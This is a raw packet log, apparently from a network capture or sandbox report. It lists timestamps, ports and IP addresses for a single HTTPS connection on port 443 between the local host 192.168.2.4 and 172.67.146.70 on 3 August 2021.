Aug 3, 2021 23:30:07.284771919 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.284919024 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.285063982 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.285079002 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.285089016 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.285100937 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.285114050 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.285764933 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.286020994 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.286039114 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.286048889 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.286195993 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.286437988 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.286456108 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.286467075 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.286484957 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.286501884 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.286542892 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.287389040 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.287406921 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.287497044 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.530024052 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.530060053 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.530082941 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.530106068 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.530131102 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.530234098 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.530360937 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.530386925 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.530424118 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.530425072 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.530474901 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.532191992 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.532640934 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.532665968 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.532699108 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.532702923 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.532721996 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.532740116 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.534276009 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.534300089 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.534320116 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.534338951 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.534370899 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.534373999 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.534427881 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.534679890 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.534702063 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.534779072 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.534878969 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.534979105 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.535021067 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.535032034 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.535729885 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.535777092 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.535793066 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.535811901 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.535846949 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.536107063 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.536140919 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.536184072 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.536457062 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.536499977 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.536537886 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.536542892 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.536581039 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.536618948 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.536619902 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.537396908 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.537436008 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.537456036 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.537468910 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.537508965 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.537972927 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.538002968 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.538026094 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.538045883 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.538053989 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.538059950 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.538079977 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.583023071 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.786241055 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.786288023 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.786300898 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.786340952 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.786370039 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.786395073 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.786412001 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.786478996 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.786608934 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.788738966 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.788777113 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.788794041 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.788821936 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.788846016 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.788897991 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.788932085 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.789133072 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.789156914 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.789208889 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.789397955 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.789423943 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.789448023 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.789472103 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.789489031 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.789489985 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.789529085 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.790363073 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.790391922 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.790405035 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.790450096 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.790472984 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.790657997 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.790684938 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.790709019 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.790734053 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.790746927 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.790756941 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.790874958 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.791635036 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.791666985 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.791691065 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.791731119 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.791766882 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.792140007 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.792169094 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.792191982 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.792212963 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.792242050 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.792292118 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.792731047 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.792761087 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.792783976 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.792807102 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.792823076 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.792849064 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.794418097 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.794454098 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.794475079 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.794497967 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.794509888 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.794522047 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.794581890 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:07.794816017 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.794840097 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:07.794929028 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.044579029 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.044619083 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.044639111 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.044656038 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.044672012 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.044975042 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.044975042 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.044992924 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.045006037 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.045037985 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.045089006 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.045511961 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.045530081 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.045546055 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.045559883 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.045562983 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.045577049 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.045602083 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.046319962 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.046339035 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.046350002 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.046396971 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.046463966 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.046693087 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.046715021 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.046729088 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.046758890 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.047143936 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.047162056 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.047178030 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.047193050 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.047209024 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.047256947 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.047372103 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.047966003 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.047990084 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.048007011 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.048022985 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.048038006 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.048059940 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.048121929 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.048950911 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.048973083 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.048989058 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.049005985 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.049037933 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.049694061 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.049711943 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.049741983 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.049751997 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.049758911 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.049774885 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.049796104 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.049844980 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.050560951 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.050581932 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.050596952 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.050610065 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.050640106 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.050683022 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.051245928 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.051265955 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.051281929 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.051294088 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.051323891 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.051384926 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.303647995 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.303678989 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.303694963 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.303714037 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.303736925 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.303792953 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.303868055 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.303910971 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.303935051 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.303956985 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.303968906 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.303978920 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.303997993 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.304001093 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.304040909 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.304858923 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.304883003 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.304892063 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.305023909 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.305238008 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.305260897 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.305279970 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.305298090 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.305313110 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.305393934 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.306126118 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.306157112 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.306183100 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.306206942 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.306229115 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.306238890 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.306283951 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.307049990 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.307080984 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.307096004 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.307111979 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.307151079 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.307233095 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.307956934 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.307991028 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.308012009 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.308031082 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.308051109 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.308085918 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.308113098 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.308912992 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.308938980 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.308955908 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.308974028 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.308991909 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.309114933 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.309751987 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.309776068 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.309791088 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.309806108 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.309820890 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.309932947 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.310632944 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.310738087 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.556788921 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.556829929 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.556853056 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.556871891 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.556896925 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.557034016 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.557059050 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.557080030 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.557256937 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.557475090 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.557503939 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.557528973 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.557550907 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.557569981 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.558269024 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.559742928 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.559779882 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.559804916 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.559822083 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.559844971 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.559869051 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.559890985 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.559919119 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.559935093 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.559959888 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.559983969 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.560005903 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.560022116 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.560023069 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.560043097 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.560100079 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.560332060 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.560355902 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.560399055 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.560422897 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.560441971 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.560447931 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.560488939 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.560529947 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.561254025 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.561600924 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563343048 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563364983 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563383102 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563400984 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563419104 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563436985 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563455105 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563469887 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563488007 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563505888 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563518047 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563534975 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563555002 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563574076 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563592911 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563606024 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563956022 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.563960075 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.563980103 CEST	443	49739	172.67.146.70	192.168.2.4
Aug 3, 2021 23:30:08.564744949 CEST	49739	443	192.168.2.4	172.67.146.70
Aug 3, 2021 23:30:08.812637091 CEST	443	49739	172.67.146.70	192.168.2.4
